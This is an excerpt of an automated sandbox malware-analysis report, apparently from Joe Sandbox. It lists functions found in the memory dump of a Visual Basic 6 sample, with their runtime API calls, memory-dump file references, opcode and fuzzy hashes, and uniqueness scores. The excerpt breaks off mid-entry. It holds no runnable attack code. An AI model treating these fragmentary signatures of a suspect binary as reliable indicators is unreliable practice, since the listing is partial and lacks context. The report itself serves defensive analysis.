                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3031735744-0
                                                                                                                                                                                  • Opcode ID: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
                                                                                                                                                                                  • Instruction ID: 31f6dc709dd63b5e7e6354cc984dc1dfaca077b65c72c4c2232904d0b2341183
                                                                                                                                                                                  • Opcode Fuzzy Hash: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A031FCB5800209EBCB04DFE4DE58ADE7B78FB48315F108559F211B72A0DB756A44CB68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040FF70 Relevance: 21.1, APIs: 14, Instructions: 80COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(660E6C30,660E6A76,00000000), ref: 0040FFAA
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFBD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FFCA
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FFCE
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0040FFE2
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFF5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FFFC
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,00000000), ref: 00410001
                                                                                                                                                                                  • #616.MSVBVM60(?,-00000001), ref: 00410011
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041001C
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410021
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0041002D
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0041005D), ref: 00410056
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00410073
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$FreeMove$#537Copy$#616ErrorOverflow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3249593964-0
                                                                                                                                                                                  • Opcode ID: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
                                                                                                                                                                                  • Instruction ID: 3391faed527fa42239c90739200fcb3ec4dff878199542e7df0cbe2f1190cda9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
                                                                                                                                                                                  • Instruction Fuzzy Hash: EC212F71D00109ABCB04DFA5DD89AEFBB78FF59700F10812AE516B72A0DB785945CB98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00419700 Relevance: 19.6, APIs: 13, Instructions: 120COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,660E6C30,00000000,660E56DE), ref: 0041975B
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,00000000), ref: 00419775
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00419796
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004197A5
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 004197B2
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004197CD
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004197D6
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004197F9
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 00419809
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 0041980F
                                                                                                                                                                                  • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00419822
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,0041984F,660E6C30,00000000,660E56DE), ref: 00419848
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(00000000,660E6C30,00000000,660E56DE), ref: 00419860
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3281955820-0
                                                                                                                                                                                  • Opcode ID: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
                                                                                                                                                                                  • Instruction ID: 91cd715af1cd97156beb3a758445edf250c8698d8b352ee1a2a14870601594c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
                                                                                                                                                                                  • Instruction Fuzzy Hash: E0418F75910219AFCB04EFA4CD95AEEB7B9FF48700F14811AE501B7290D7B4AC81CBE9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00410560 Relevance: 18.1, APIs: 12, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,?,004025E6), ref: 00410645
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 0041067E
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004106D3
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 004106FC
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410712
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 00410735
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,004025E6), ref: 00410758
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$Chkstk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1207130036-0
                                                                                                                                                                                  • Opcode ID: 62ff90cb35de8ef11aa2b30622b115efdf93fef2ebd10f5ae9c3101067cccd5d
                                                                                                                                                                                  • Instruction ID: 2137da7fcd73fff1979705b1bef70d61cd8a95bb74c88752949aaefb45c8b53a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 62ff90cb35de8ef11aa2b30622b115efdf93fef2ebd10f5ae9c3101067cccd5d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C5107B4901208EBDB14DFA4DA48BDEBBB4FF48314F20805AE51477390C7B99A84DF69
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00410E60 Relevance: 18.1, APIs: 12, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,0040BC66,0041B038,?,?,?,004025E6), ref: 00410E7E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00410EAE
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00410EC5
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,00000000,004025E6), ref: 00410ED1
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410EDF
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00410EE8
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F03
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F14
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F25
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410F33
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,00000000,004025E6), ref: 00410F41
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,004025E6), ref: 00410F57
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3861917509-0
                                                                                                                                                                                  • Opcode ID: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                                                  • Instruction ID: d7813b94c935956c428f1e1f47a44fa569b160c913a03527725d119065563702
                                                                                                                                                                                  • Opcode Fuzzy Hash: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31ECB5901208EFDB04DFA4DA49BDEBBB8FB48714F108119F515BB290D7B89A44CBA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040FA50 Relevance: 18.1, APIs: 12, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                                                  • #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 947554498-0
                                                                                                                                                                                  • Opcode ID: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                                                  • Instruction ID: 2ea1275da5938a61f9bbdbea3727b2d8b601beaa9e21b66b0b90c65097ce1408
                                                                                                                                                                                  • Opcode Fuzzy Hash: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                                                  • Instruction Fuzzy Hash: A031ECB5800248EBDB04DFD4DA58BDEBBB4FF08715F208169E511B72A0DB795A44CB64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00404843 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040CF8E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,004025E6), ref: 0040CFD5
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0040D006
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,0000004C), ref: 0040D039
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040D078
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0C1
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,00000040), ref: 0040D0F9
                                                                                                                                                                                  • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 0040D11C
                                                                                                                                                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D12F
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040D152
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D15D
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040D190
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040D1AB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                  • API String ID: 269068952-1684325040
                                                                                                                                                                                  • Opcode ID: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                                                  • Instruction ID: e12f10e6882a07b68982d9b1f0c67d4f52429f3b1a0b66e6b96f65459c310862
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 06511B75900208EBDB14DFA4C948BDEBBB4FF48704F208269F509BB291D7759A85CF68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00415C8A Relevance: 16.5, APIs: 11, Instructions: 31COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$CloseFile$DestructExitProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1320429144-0
                                                                                                                                                                                  • Opcode ID: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                                                  • Instruction ID: ac45af5dedd4f35385674aac5ef352c541f385de1dfbdc7eb18f47d75152aea7
                                                                                                                                                                                  • Opcode Fuzzy Hash: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53F0A471C1416CDBCB08EBA0ED55ADDBB38EF94310F11402AE846B31B49E702E85CEA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040E570 Relevance: 15.1, APIs: 10, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E58E
                                                                                                                                                                                  • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,004025E6), ref: 0040E5D4
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E5E3
                                                                                                                                                                                  • __vbaVarVargNofree.MSVBVM60(?,?,?,?,004025E6), ref: 0040E5F6
                                                                                                                                                                                  • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,004025E6), ref: 0040E5FD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E608
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60 ref: 0040E620
                                                                                                                                                                                  • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E646
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040E652
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(0040E67A,?,?,?,?,?,?,004025E6), ref: 0040E673
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3705209087-0
                                                                                                                                                                                  • Opcode ID: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                                                  • Instruction ID: 36ceea50de92772e66bb97ede622d2113149341719cd49f3f7e07eaeda4390cb
                                                                                                                                                                                  • Opcode Fuzzy Hash: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F31F875900208EFCB04DF94C949B9DBBB4FF48304F108669F515B73A0D774AA85CB98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00404829 Relevance: 12.1, APIs: 8, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 306309671-0
                                                                                                                                                                                  • Opcode ID: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                                                  • Instruction ID: 6c1e095cc9405d84f172de8fc6481e1172c739fb8f3d4ebecced46b1c4c61411
                                                                                                                                                                                  • Opcode Fuzzy Hash: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F312D71910214EBDB10AF95CE89EDEBBBCFF08B40F10412AF545B3690D77899458BA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00414D90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60(660E6C4A,00000000), ref: 00414DCE
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60(h#@,660E6C4A,00000000), ref: 00414DE2
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00414E27
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00414E32
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
